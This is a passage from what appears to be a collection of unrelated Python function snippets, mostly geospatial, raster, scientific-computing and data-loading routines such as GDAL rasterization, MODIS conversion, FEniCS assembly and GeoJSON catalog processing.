Shapefile(shapefiles_dir, shpfile.name)\n csvfile = shapefile.read_shape_file(datatype, rasterdata, data, self.minVal)\n csvfile = np.array(csvfile)\n\n output = OutputFile(output_dir, shapefile.getDirName(), self.name, datatype, observation_date)\n output.save(csvfile)\n\n del rasterdata", "def create_test_function(source, output, lang):\n with open(source) as f:\n snippet = f.read()\n with open(output) as f:\n res = f.read()\n\n def tst_func(slf):\n slf.do(snippet, res, lang=lang)\n\n return tst_func", "def main(config_file, rows, cols):\n # setup paths\n _, _, params = cf.get_ifg_paths(config_file)\n _postprocess_linrate(rows, cols, params)\n if params[cf.TIME_SERIES_CAL]:\n _postprocess_timeseries(rows, cols, params)", "def convert(self):\n \n vrtlist = sorted(glob.glob(self.fullPath + '/*vrt'))\n splitAt = len(self.fullPath) + 1\n \n if len(vrtlist)!=0:\n for i in range(0,len(vrtlist)):\n prefix = str(vrtlist[i].split(\".vrt\")[0])\n prefix = prefix[:splitAt] + 'full' + prefix[splitAt:]\n ct = pymodis.convertmodis_gdal.convertModisGDAL(hdfname = vrtlist[i], \n prefix = prefix, subset = self.subset, res = self.resolution, \n outformat = self.outformat, wkt = self.projection, resampl = 'NEAREST_NEIGHBOR', vrt = True)\n ct.run()\n mosdel = glob.glob(self.fullPath + '/*mos.tif')\n for f in mosdel:\n os.remove(f)\n xmldel = glob.glob(self.fullPath + '/*mos.tif.xml') \n for f in xmldel:\n os.remove(f)\n vrtdel = glob.glob(self.fullPath + '/*.vrt')\n for f in vrtdel:\n os.remove(f)\n tifCount = len(glob.glob(self.fullPath + '/*.tif'))\n dataCount = self.subset.count('1')\n logger.log('SUCCESS', 'Conversion complete! The %d bands of %d mosaicked images were successfully converted to %d %s files.' % (dataCount, len(vrtlist), tifCount, str(self.outformat)))\n \n \n if len(vrtlist)==0: \n \n hdflist = sorted(glob.glob(self.fullPath + '/*.hdf'))\n for i in range(len(hdflist)):\n ms = pymodis.convertmodis_gdal.createMosaicGDAL(hdfnames = [hdflist[i]], subset = self.subset, outformat = 'GTiff')\n ms.run(str(hdflist[i].split('.h')[0]) + 'mos.tif')\n ms.write_vrt(output = str(hdflist[i].split('.h')[0]), separate = True)\n\n vrtlist = sorted(glob.glob(self.fullPath + '/*vrt'))\n splitAt = len(self.fullPath) + 1\n \n for i in range(0,len(vrtlist)):\n prefix = str(vrtlist[i].split(\".vrt\")[0])\n prefix = prefix[:splitAt] + 'full' + prefix[splitAt:]\n ct = pymodis.convertmodis_gdal.convertModisGDAL(hdfname = vrtlist[i], \n prefix = prefix, subset = self.subset, res = self.resolution, \n outformat = self.outformat, wkt = self.projection, resampl = 'NEAREST_NEIGHBOR', vrt = True)\n ct.run()\n \n mosdel = glob.glob(self.fullPath + '/*mos.tif')\n for f in mosdel:\n os.remove(f)\n xmldel = glob.glob(self.fullPath + '/*mos.tif.xml') \n for f in xmldel:\n os.remove(f)\n vrtdel = glob.glob(self.fullPath + '/*.vrt')\n for f in vrtdel:\n os.remove(f)\n tifCount = len(glob.glob(self.fullPath + '/full*.tif'))\n dataCount = self.subset.count('1')\n logger.log('SUCCESS', 'Conversion complete! The %d bands of %d HDF files were successfully converted to %d %s files.' % (dataCount, len(hdflist), tifCount, str(self.outformat)))", "def function_closure(functions, casify):\r\n def render_function(children):\r\n \"\"\"\r\n Escape function names and give proper formatting to exceptions.\r\n\r\n The exceptions being 'sqrt', 'log2', and 'log10' as of now.\r\n \"\"\"\r\n fname = children[0].latex\r\n if casify(fname) not in functions:\r\n pass # TODO turn unknown function red or give some kind of error\r\n\r\n # Wrap the input of the function with parens or braces.\r\n inner = children[1].latex\r\n if fname == \"sqrt\":\r\n inner = u\"{{{expr}}}\".format(expr=inner)\r\n else:\r\n if children[1].tall:\r\n inner = ur\"\\left({expr}\\right)\".format(expr=inner)\r\n else:\r\n inner = u\"({expr})\".format(expr=inner)\r\n\r\n # Correctly format the name of the function.\r\n if fname == \"sqrt\":\r\n fname = ur\"\\sqrt\"\r\n elif fname == \"log10\":\r\n fname = ur\"\\log_{10}\"\r\n elif fname == \"log2\":\r\n fname = ur\"\\log_2\"\r\n else:\r\n fname = ur\"\\text{{{fname}}}\".format(fname=fname)\r\n\r\n # Put it together.\r\n latex = fname + inner\r\n return LatexRendered(latex, tall=children[1].tall)\r\n # Return the function within the closure.\r\n return render_function", "def generic_function(self, node, ordered_functions):\n for generic in node.fortran_generic:\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n new._generated = \"fortran_generic\"\n fmt = new.fmtdict\n # XXX append to existing suffix\n if generic.fmtdict:\n fmt.update(generic.fmtdict)\n fmt.function_suffix = fmt.function_suffix + generic.function_suffix\n new.fortran_generic = {}\n new.wrap.assign(fortran=True)\n new.ast.declarator.params = generic.decls\n\n # Try to call original C function if possible.\n # All arguments are native scalar.\n need_wrapper = False\n if new.ast.declarator.is_indirect():\n need_wrapper = True\n \n for arg in new.ast.declarator.params:\n if arg.declarator.is_indirect():\n need_wrapper = True\n break\n elif arg.typemap.sgroup == \"native\":\n pass\n else:\n need_wrapper = True\n break\n\n if need_wrapper:\n # The C wrapper is required to cast constants.\n # generic.yaml: GenericReal\n new.C_force_wrapper = True\n new.wrap.c = True\n new._PTR_C_CXX_index = node._function_index\n else:\n new._PTR_F_C_index = node._function_index\n \n # Do not process templated node, instead process\n # generated functions above.\n # node.wrap.c = False\n node.wrap.fortran = False", "def _run_file_contents(contents: dict, strict_fn, debug_print):\n\n default_fns_args = {\n \"adjust_focus\": {\"on\": \"hexbin\"},\n \"adjust_positioning\": True,\n \"adjust_opacity\": True\n }\n\n input_fns = contents.pop(\"functions\", {})\n for k, v in default_fns_args.items():\n if k not in input_fns:\n input_fns[k] = v\n\n output = contents.pop(\"output\", False)\n display = contents.pop(\"display\", True)\n builder = PlotBuilder.builder_from_dict(**contents)\n debug_print(\"* all layers loaded\")\n\n for k, v in input_fns.items():\n if v:\n args, kwargs = parse_args_kwargs(v)\n try:\n _fn_map[k](builder, *args, **kwargs)\n debug_print(f\"* invoked function '{_fn_map[k].__name__}'.\\nargs: {args}\\nkwargs: {kwargs}\")\n except Exception as e:\n try:\n debug_print(f\"* error while performing '{_fn_map[k].__name__}'.\\nerror: {e}\")\n strict_fn(e)\n except KeyError as f:\n debug_print(f\"* no such function as '{k}'.\")\n strict_fn(f)\n\n builder.finalize(raise_errors=False)\n\n if output:\n args, kwargs = parse_args_kwargs(output)\n builder.output(*args, **kwargs)\n debug_print(\"* figure output.\")\n\n if display:\n args, kwargs = parse_args_kwargs(display)\n builder.display(*args, **kwargs)\n debug_print(\"* figure displayed.\")\n\n return builder.get_plot_status()", "def main():\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(dest='INFILE')\r\n parser.add_argument(dest='OUTFILE')\r\n\r\n args = parser.parse_args()\r\n function1(args.INFILE, args.OUTFILE)", "def apply_function_vector(function_vector, x_vector):\n function_index = 0\n element_index = 1\n \n def d():\n for e in zip(function_vector, x_vector):\n print(e[1])\n d()\n \n return list(map(lambda fx_set: fx_set[function_index](fx_set[element_index]), zip(function_vector, x_vector)))", "def use_vectors(*funcs):\n\n global GLOBAL_STATUS\n if funcs:\n GLOBAL_STATUS.discard('ARRAYS')\n GLOBAL_STATUS.add('VECTORS')\n GLOBAL_STATUS.discard('SCALARS')\n else:\n GLOBAL_STATUS.discard('ARRAYS')\n GLOBAL_STATUS.discard('VECTORS')\n GLOBAL_STATUS.discard('SCALARS')\n\n for name in _get_func_names(funcs):\n if ('scalar' not in name and 'vector' not in name\n and 'array' not in name):\n globals()[name] = globals()[name].vector", "def convert(func, overload_module, transformers):\n source, _ = parsing.parse_entity(func)\n entity_info = transformer.EntityInfo(\n source_code=source,\n source_file='<fragment>',\n namespace={},\n arg_values=None,\n arg_types={},\n owner_type=None)\n\n overload_module.PyctrReturnException = PyctrReturnException\n\n namer = naming.Namer(entity_info.namespace)\n ctx = transformer.EntityContext(namer, entity_info)\n overload_name = ctx.namer.new_symbol('overload', set())\n overload = config.VirtualizationConfig(overload_module, overload_name)\n\n source = _transform(source, ctx, overload, transformers)\n gen_func = _wrap_in_generator(func, source, namer, overload)\n gen_func = _attach_closure(func, gen_func)\n return gen_func", "def load_raw_wignetting_function():\n global rawvignfun\n if rawvignfun is None:\n vignfile = get_vigneting_by_urd(28)\n x = 23.5 + np.tan(vignfile[\"Offset angles\"].data[\"X\"]*pi/180/60.)*F/DL\n y = 23.5 + np.tan(vignfile[\"Offset angles\"].data[\"Y\"]*pi/180/60.)*F/DL\n rawvignfun = RegularGridInterpolator((vignfile[\"5 arcmin PSF\"].data[\"E\"], x, y), vignfile[\"5 arcmin PSF\"].data[\"EFFAREA\"])\n return rawvignfun", "def main():\r\n\r\n #Create a list of all files that have the GPX file format\r\n fileList = glob.glob(os.path.join(inFolder,\"*.{0}\".format(inFormat)))\r\n\r\n #Create a connection to PostGIS database\r\n pgConn = createPostgisConnection(dbFormat, dbHost, dbName, dbSchema, dbUser, dbPWD)\r\n\r\n #Process each *listed* layer type from a GPS file\r\n for f in fileList:\r\n importGPX(f, gpxImportLayers, pgConn)", "def main(file):\n\n # Get the current working directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def input(self, *args, **kwargs):\n return lambda wildcards: self.samples.map(*args, file=\"samples/all/runs/{sample_run}/samples.csv\", **wildcards, **kwargs)", "def process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n # use the func to insert data from these files to database's fact and dim tables\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def assemble_eval(\n fenics_function: Callable,\n fenics_templates: Iterable[FenicsVariable],\n *args: np.array,\n) -> Tuple[np.array, ufl.Form, Tuple[FenicsVariable]]:\n\n check_input(fenics_templates, *args)\n fenics_inputs = convert_all_to_fenics(fenics_templates, *args)\n\n out = fenics_function(*fenics_inputs)\n if not isinstance(out, tuple):\n raise ValueError(\n \"FEniCS function output should be in the form (assembly_output, ufl_form).\"\n )\n\n assembly_output, ufl_form = out\n\n if isinstance(assembly_output, tuple):\n raise ValueError(\n \"Only single solution output from FEniCS function is supported.\"\n )\n\n if not isinstance(assembly_output, float):\n raise ValueError(\n f\"FEniCS function output should be in the form (assembly_output, ufl_form). Got {type(assembly_output)} instead of float\"\n )\n\n if not isinstance(ufl_form, ufl.Form):\n raise ValueError(\n f\"FEniCS function output should be in the form (assembly_output, ufl_form). Got {type(ufl_form)} instead of ufl.Form\"\n )\n\n numpy_output = np.asarray(assembly_output)\n return numpy_output, ufl_form, fenics_inputs", "def load_viewpoints(viewpoint_file_list):\n\n if isinstance(viewpoint_file_list, str):\n vp_file_list = [viewpoint_file_list]\n\n try:\n vp_file_list = iter(viewpoint_file_list)\n except TypeError:\n print(\"viewpoint_file_list is not an iterable object\")\n\n for vp_file in vp_file_list:\n yield load_viewpoint(vp_file)", "def apply_funcs(self, src_dir, pkl_name, dest_dir, funclist):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n pkl_files = os.listdir(src_dir)\n data_in = open(os.path.join(src_dir, pkl_name), 'rb')\n data_array = pickle.load(data_in)\n dump_array = []\n for i, data_dict in enumerate(data_array):\n new_data_dict = self.dutils.apply_flist(data_dict, funclist, w_rosdict=True)\n if new_data_dict.get(\"flag\", True):\n dump_array.append(new_data_dict)\n new_pkl_name = pkl_name\n dump_path = os.path.join(dest_dir, new_pkl_name)\n self.pickledump(dump_array, dump_path)\n self.seen_pkls.append(new_pkl_name)\n return new_pkl_name", "def write_triggers_to_file(triggerfile, functionfile,\n generators, entityname, table, path, select,\n indextable, index):\n for generator in generators:\n gen = generator(entityname, table, path, select, indextable, index)\n functionfile.write(gen.function)\n triggerfile.write(gen.trigger)", "def jvp_assemble_eval(\n fenics_function: Callable,\n fenics_templates: Iterable[FenicsVariable],\n primals: Tuple[np.array],\n tangents: Tuple[np.array],\n) -> Tuple[np.array]:\n\n numpy_output_primal, output_primal_form, fenics_primals = assemble_eval(\n fenics_function, fenics_templates, *primals\n )\n\n # Now tangent evaluation!\n fenics_tangents = convert_all_to_fenics(fenics_primals, *tangents)\n output_tangent_form = 0.0\n for fp, ft in zip(fenics_primals, fenics_tangents):\n output_tangent_form += fenics.derivative(output_primal_form, fp, ft)\n\n if not isinstance(output_tangent_form, float):\n output_tangent_form = ufl.algorithms.expand_derivatives(output_tangent_form)\n output_tangent = fenics.assemble(output_tangent_form)\n\n jax_output_tangent = output_tangent\n\n return numpy_output_primal, jax_output_tangent", "def process_svgs(model_info, directory, output, allow_missing=False):\n r2dt.write(model_info, directory, output, allow_missing=allow_missing)", "def transform_regions(region_list, wcs_in, wcs_out, preroot,\n reg_format='fits', clobber=False):\n\n if reg_format == 'ascii':\n func = transform_region_ascii\n elif reg_format == 'fits':\n func = transform_region_fits\n else:\n raise ValueError(\"Unsupported reg_format=\" + reg_format)\n\n outfiles = []\n for region_file in region_list:\n\n # Do not do anything if the output file already exists and\n # clobber is not set.\n #\n outfile = preroot + region_file\n outfiles.append(outfile)\n if not clobber and os.path.exists(outfile):\n continue\n\n func(region_file, outfile, wcs_in, wcs_out)\n\n return outfiles", "def process(sources, output, force):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s [%(levelname)s] - %(message)s', datefmt=\"%H:%M:%S\")\n\n logging.getLogger('shapely.geos').setLevel(logging.WARNING)\n logging.getLogger('Fiona').setLevel(logging.WARNING)\n logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n requests.packages.urllib3.disable_warnings()\n # logging.getLogger('processing').setLevel(logging.DEBUG)\n\n catalog_features = []\n failures = []\n path_parts_to_skip = utils.get_path_parts(sources).index(\"sources\") + 1\n success = True\n for path in utils.get_files(sources):\n try:\n logging.info(\"Processing \" + path)\n pathparts = utils.get_path_parts(path)[path_parts_to_skip:]\n pathparts[-1] = pathparts[-1].replace('.json', '.geojson')\n\n outdir = os.path.join(output, *pathparts[:-1], pathparts[-1].replace('.geojson', ''))\n outfile = os.path.join(output, *pathparts)\n\n source = utils.read_json(path)\n urlfile = urlparse(source['url']).path.split('/')[-1]\n \n if not hasattr(adapters, source['filetype']):\n logging.error('Unknown filetype ' + source['filetype'])\n failures.append(path)\n continue\n \n read_existing = False\n if os.path.isfile(outfile):\n logging.info(\"Output file exists\")\n if os.path.getmtime(outfile) > os.path.getmtime(path):\n logging.info(\"Output file is up to date\")\n if not force:\n read_existing = True\n logging.warning('Skipping ' + path + ' since generated file exists. Use --force to regenerate.') \n else:\n logging.info(\"Output is outdated, {} < {}\".format(\n datetime.datetime.fromtimestamp(os.path.getmtime(outfile)),\n datetime.datetime.fromtimestamp(os.path.getmtime(path))))\n\n if read_existing:\n with open(outfile, \"rb\") as f:\n geojson = json.load(f)\n properties = geojson['properties']\n else:\n logging.info('Downloading ' + source['url'])\n \n try:\n fp = utils.download(source['url'])\n except IOError:\n logging.error('Failed to download ' + source['url'])\n failures.append(path)\n continue\n \n logging.info('Reading ' + urlfile)\n \n if 'filter' in source:\n filterer = BasicFilterer(source['filter'], source.get('filterOperator', 'and'))\n else:\n filterer = None\n \n try:\n geojson = getattr(adapters, source['filetype'])\\\n .read(fp, source['properties'],\n filterer=filterer,\n layer_name=source.get(\"layerName\", None),\n source_filename=source.get(\"filenameInZip\", None))\n except IOError as e:\n logging.error('Failed to read ' + urlfile + \" \" + str(e))\n failures.append(path)\n continue\n except zipfile.BadZipfile as e:\n logging.error('Unable to open zip file ' + source['url'])\n failures.append(path)\n continue\n finally:\n os.remove(fp.name)\n if(len(geojson['features'])) == 0:\n logging.error(\"Result contained no features for \" + path)\n continue\n excluded_keys = ['filetype', 'url', 'properties', 'filter', 'filenameInZip']\n properties = {k:v for k,v in list(source.items()) if k not in excluded_keys}\n properties['source_url'] = source['url']\n properties['feature_count'] = len(geojson['features'])\n logging.info(\"Generating demo point\")\n properties['demo'] = geoutils.get_demo_point(geojson)\n \n geojson['properties'] = properties\n \n utils.make_sure_path_exists(os.path.dirname(outfile))\n\n #cleanup existing generated files\n if os.path.exists(outdir):\n rmtree(outdir)\n filename_to_match, ext = os.path.splitext(pathparts[-1])\n output_file_dir = os.sep.join(utils.get_path_parts(outfile)[:-1])\n logging.info(\"looking for generated files to delete in \" + output_file_dir)\n for name in os.listdir(output_file_dir):\n base, ext = os.path.splitext(name)\n if base == filename_to_match:\n to_remove = os.path.join(output_file_dir, name)\n logging.info(\"Removing generated file \" + to_remove)\n os.remove(to_remove)\n\n utils.write_json(outfile, geojson)\n\n logging.info(\"Generating label points\")\n label_geojson = geoutils.get_label_points(geojson)\n label_path = outfile.replace('.geojson', '.labels.geojson')\n utils.write_json(label_path, label_geojson)\n\n logging.info('Done. Processed to ' + outfile)\n \n if not \"demo\" in properties:\n properties['demo'] = geoutils.get_demo_point(geojson)\n\n properties['path'] = \"/\".join(pathparts)\n catalog_entry = {\n 'type': 'Feature',\n 'properties': properties,\n 'geometry': geoutils.get_union(geojson)\n }\n catalog_features.append(catalog_entry)\n\n if not os.path.exists(outdir) or not os.path.exists(os.path.join(outdir, \"units.json\")):\n logging.info(\"Generated exploded GeoJSON to \" + outdir)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n # .json instead of .geojson, incase there is a unit named \"source\"\n utils.write_json(os.path.join(outdir, \"source.json\"), catalog_entry) \n units = []\n for feature in geojson['features']:\n feature_id = str(feature['properties']['id'])\n feature_id = feature_id.replace('/', '')\n feature_filename = os.path.join(outdir, feature_id + \".geojson\")\n utils.write_json(feature_filename, feature)\n units.append(feature['properties'])\n utils.write_json(os.path.join(outdir, \"units.json\"), units)\n else:\n logging.debug(\"exploded GeoJSON already exists, not generating\")\n\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Error processing file \" + path)\n failures.append(path)\n success = False\n\n catalog = {\n 'type': 'FeatureCollection',\n 'features': catalog_features\n }\n utils.write_json(os.path.join(output,'catalog.geojson'), catalog)\n\n if not success:\n logging.error(\"Failed sources: \" + \", \".join(failures))\n sys.exit(-1)", "def _generate_and_save_function(self, filename, expression, parameters):\n\n # check for / create the save folder for this expression\n folder = self.config_folder + '/' + filename\n abr_control.utils.os_utils.makedirs(folder)\n\n if self.use_cython is True:\n # binaries saved by specifying tempdir parameter\n function = autowrap(expression, backend=\"cython\",\n args=parameters, tempdir=folder)\n function = sp.lambdify(parameters, expression, \"numpy\")\n\n return function", "def _add_function(self, alias, func):\n # Construct a function that will call the user supplied function with\n # the proper arguments. We prepend 'self' so the user supplied function\n # has easy access to all the filepaths.\n def fname(**kwargs):\n return func(self, **kwargs)\n\n # Bind the fname function to this instance of FileNames\n self.__dict__[alias] = fname", "def get_verts(ulist, vlist, func):\n verts = []\n for u in ulist:\n for v in vlist:\n verts.append(func(u, v))\n return verts", "def ramlwrap(file_path, function_map):\n\n try:\n # Check if file is RAML (.raml)\n if file_path.endswith(\".raml\"):\n patterns = raml_url_patterns(file_path, function_map)\n else:\n error_msg = \"The file: '{}' does not have a .raml extension!\".format(file_path)\n logger.error(error_msg)\n raise FatalException(error_msg)\n\n except AttributeError as error:\n error_msg = \"An error occurred reading '{}': {}\".format(file_path, error)\n logger.error(error_msg)\n raise FatalException(error_msg)\n\n return patterns", "def file_converter(self, **kwds):\n if (self.reformat == 'zarr'):\n # output zarr file\n self.HDF5_to_zarr(**kwds)\n elif (self.reformat == 'HDF5'):\n # output rechunked HDF5 file\n self.HDF5_to_HDF5(**kwds)\n # elif (reformat == 'JPL'):\n # # output JPL captoolkit formatted HDF5 files\n # self.HDF5_to_JPL_HDF5(**kwds)\n elif self.reformat in ('csv','txt'):\n # output reduced files to ascii formats\n self.HDF5_to_ascii(**kwds)\n elif self.reformat in ('dataframe',):\n # output reduced files to pandas dataframe\n return self.HDF5_to_dataframe(**kwds)\n else:\n raise ValueError(f'Unknown format {self.reformat}')", "def process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def get_vit_fn(model, num_classes, spatial_res):\n model = model.lower()\n assert model in VIT_FNS\n vit_fn = VIT_FNS[model]\n\n def wrapped_vit_model_fn(*args, **kwargs):\n return vit_fn(*args, num_classes=num_classes,\n image_size=spatial_res, **kwargs)\n return wrapped_vit_model_fn", "def _rasterize_vector_onto_base(\n base_raster_path, base_vector_path, attribute_id,\n target_raster_path, filter_string=None):\n base_raster = gdal.OpenEx(base_raster_path, gdal.OF_RASTER)\n raster_driver = gdal.GetDriverByName('GTiff')\n target_raster = raster_driver.CreateCopy(target_raster_path, base_raster)\n base_raster = None\n\n vector = gdal.OpenEx(base_vector_path)\n layer = vector.GetLayer()\n\n if filter_string is not None:\n layer.SetAttributeFilter(str(filter_string))\n gdal.RasterizeLayer(\n target_raster, [1], layer,\n options=['ATTRIBUTE=%s' % attribute_id])\n target_raster.FlushCache()\n target_raster = None\n layer = None\n vector = None", "def get_transfer_functioin(self, color_file=None, volume_opacity=0.25):\n if color_file: # Color file is given\n\n import csv\n fid = open(color_file, \"r\")\n reader_color = csv.reader(fid)\n\n dict_RGB = {}\n for line in reader_color:\n dict_RGB[int(line[0])] = [float(line[2]) / 255.0,\n float(line[3]) / 255.0,\n float(line[4]) / 255.0]\n fid.close()\n\n # Define colour transfer function\n color_transfor = vtk.vtkColorTransferFunction()\n\n for idx in dict_RGB.keys():\n color_transfor.AddRGBPoint(idx,\n dict_RGB[idx][0],\n dict_RGB[idx][1],\n dict_RGB[idx][2])\n\n # Opacity transfer function\n opacity_scalar = vtk.vtkPiecewiseFunction()\n\n for idx in dict_RGB.keys():\n opacity_scalar.AddPoint(\n idx, volume_opacity if idx != 0 else 0.0)\n\n # Opacity Gradient Transfer function\n opacity_gradient = vtk.vtkPiecewiseFunction()\n opacity_gradient.AddPoint(1, 0.0)\n opacity_gradient.AddPoint(5, 0.1)\n opacity_gradient.AddPoint(100, 1.0)\n\n return color_transfor, opacity_scalar, opacity_gradient\n\n else: # Default color transfer functions\n\n # min, max = self.get_value_range()\n color_transfor = vtk.vtkColorTransferFunction()\n color_transfor.AddRGBPoint(0, 0.0, 0.0, 0.0)\n color_transfor.AddRGBPoint(500, 1.0, 0.5, 0.3)\n color_transfor.AddRGBPoint(1000, 1.0, 0.5, 0.3)\n color_transfor.AddRGBPoint(1150, 1.0, 1.0, 0.9)\n\n # The opacity transfer function is used to control the opacity\n # of different tissue types.\n opacity_scalar = vtk.vtkPiecewiseFunction()\n opacity_scalar.AddPoint(0, 0.00)\n opacity_scalar.AddPoint(500, 0.15)\n opacity_scalar.AddPoint(1000, 0.15)\n opacity_scalar.AddPoint(1150, 0.85)\n\n # The gradient opacity function is used to decrease the opacity\n # in the \"flat\" regions of the volume while maintaining the opacity\n # at the boundaries between tissue types. The gradient is measured\n # as the amount by which the intensity changes over unit distance.\n # For most medical data, the unit distance is 1mm.\n opacity_gradient = vtk.vtkPiecewiseFunction()\n opacity_gradient.AddPoint(0, 0.0)\n opacity_gradient.AddPoint(90, 0.5)\n opacity_gradient.AddPoint(100, 1.0)\n\n return color_transfor, opacity_scalar, opacity_gradient", "def input_fn():\n files = tf.data.Dataset.list_files(os.path.join(\n tft_working_dir, filebase + '*'))\n dataset = files.interleave(\n tf.data.TFRecordDataset, cycle_length=4, block_length=16)\n dataset = dataset.map(parser)\n\n if shuffle:\n dataset = dataset.shuffle(buffer_size)\n\n dataset = dataset.repeat(num_epochs)\n dataset = dataset.batch(batch_size)\n\n dataset = dataset.prefetch(prefetch_buffer_size)\n iterator = dataset.make_one_shot_iterator()\n transformed_features, transformed_labels = iterator.get_next()\n\n return transformed_features, transformed_labels", "def process_data(cur, conn, filepath: str, func: Callable) -> None:\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, \"*.json\"))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print(\"{} files found in {}\".format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print(\"{}/{} files processed.\".format(i, num_files))", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def list_functions(filename, output_file):\n file_pointer = open(filename)\n file_split = filename.replace(\"/\",\".\")\n file_split = file_split.split(\".\")\n\n file_text = file_pointer.read()\n my_re = re.compile(\"\\ndef ([a-z][^\\(]*)\")\n functions = my_re.findall(file_text)\n functions.sort()\n first = True\n\n cr_re = re.compile(r\"\\n *\")\n for function in functions:\n function = cr_re.sub(\" \", function)\n if first:\n first = False\n output_file.write(\"Functions\\n\")\n output_file.write(\"^^^^^^^^^\\n\")\n output_file.write(\"- \")\n module = file_split[4]\n output_file.write(f\":func:`~arcade.{module}.{function}`\")\n output_file.write(\"\\n\")\n if not first:\n output_file.write(\"\\n\")", "def rasterize(\n ctx,\n files,\n output,\n driver,\n like,\n bounds,\n dimensions,\n res,\n src_crs,\n all_touched,\n default_value,\n fill,\n prop,\n force_overwrite,\n creation_options):\n from rasterio.crs import CRS\n from rasterio.features import rasterize\n from rasterio.features import bounds as calculate_bounds\n\n verbosity = (ctx.obj and ctx.obj.get('verbosity')) or 1\n\n output, files = resolve_inout(\n files=files, output=output, force_overwrite=force_overwrite)\n\n bad_param = click.BadParameter('invalid CRS. Must be an EPSG code.',\n ctx, param=src_crs, param_hint='--src_crs')\n has_src_crs = src_crs is not None\n try:\n src_crs = CRS.from_string(src_crs) if has_src_crs else CRS.from_string('EPSG:4326')\n except CRSError:\n raise bad_param\n\n # If values are actually meant to be integers, we need to cast them\n # as such or rasterize creates floating point outputs\n if default_value == int(default_value):\n default_value = int(default_value)\n if fill == int(fill):\n fill = int(fill)\n\n with rasterio.Env(CPL_DEBUG=verbosity > 2):\n\n def feature_value(feature):\n if prop and 'properties' in feature:\n return feature['properties'].get(prop, default_value)\n return default_value\n\n with click.open_file(files.pop(0) if files else '-') as gj_f:\n geojson = json.loads(gj_f.read())\n if 'features' in geojson:\n geometries = []\n for f in geojson['features']:\n geometries.append((f['geometry'], feature_value(f)))\n elif 'geometry' in geojson:\n geometries = ((geojson['geometry'], feature_value(geojson)), )\n else:\n raise click.BadParameter('Invalid GeoJSON', param=input,\n param_hint='input')\n\n geojson_bounds = geojson.get('bbox', calculate_bounds(geojson))\n\n if os.path.exists(output):\n with rasterio.open(output, 'r+') as out:\n if has_src_crs and src_crs != out.crs:\n raise click.BadParameter('GeoJSON does not match crs of '\n 'existing output raster',\n param='input', param_hint='input')\n\n if disjoint_bounds(geojson_bounds, out.bounds):\n click.echo(\"GeoJSON outside bounds of existing output \"\n \"raster. Are they in different coordinate \"\n \"reference systems?\",\n err=True)\n\n meta = out.meta.copy()\n\n result = rasterize(\n geometries,\n out_shape=(meta['height'], meta['width']),\n transform=meta.get('affine', meta['transform']),\n all_touched=all_touched,\n dtype=meta.get('dtype', None),\n default_value=default_value,\n fill=fill)\n\n for bidx in range(1, meta['count'] + 1):\n data = out.read(bidx, masked=True)\n # Burn in any non-fill pixels, and update mask accordingly\n ne = result != fill\n data[ne] = result[ne]\n data.mask[ne] = False\n out.write(data, indexes=bidx)\n\n else:\n if like is not None:\n template_ds = rasterio.open(like)\n\n if has_src_crs and src_crs != template_ds.crs:\n raise click.BadParameter('GeoJSON does not match crs of '\n '--like raster',\n param='input', param_hint='input')\n\n if disjoint_bounds(geojson_bounds, template_ds.bounds):\n click.echo(\"GeoJSON outside bounds of --like raster. \"\n \"Are they in different coordinate reference \"\n \"systems?\",\n err=True)\n\n kwargs = template_ds.meta.copy()\n kwargs['count'] = 1\n\n # DEPRECATED\n # upgrade transform to affine object or we may get an invalid\n # transform set on output\n kwargs['transform'] = template_ds.affine\n\n template_ds.close()\n\n else:\n bounds = bounds or geojson_bounds\n\n if src_crs.is_geographic:\n if (bounds[0] < -180 or bounds[2] > 180 or\n bounds[1] < -80 or bounds[3] > 80):\n raise click.BadParameter(\n \"Bounds are beyond the valid extent for \"\n \"EPSG:4326.\",\n ctx, param=bounds, param_hint='--bounds')\n\n if dimensions:\n width, height = dimensions\n res = (\n (bounds[2] - bounds[0]) / float(width),\n (bounds[3] - bounds[1]) / float(height)\n )\n\n else:\n if not res:\n raise click.BadParameter(\n 'pixel dimensions are required',\n ctx, param=res, param_hint='--res')\n\n elif len(res) == 1:\n res = (res[0], res[0])\n\n width = max(int(ceil((bounds[2] - bounds[0]) /\n float(res[0]))), 1)\n height = max(int(ceil((bounds[3] - bounds[1]) /\n float(res[1]))), 1)\n\n kwargs = {\n 'count': 1,\n 'crs': src_crs,\n 'width': width,\n 'height': height,\n 'transform': Affine(res[0], 0, bounds[0], 0, -res[1],\n bounds[3]),\n 'driver': 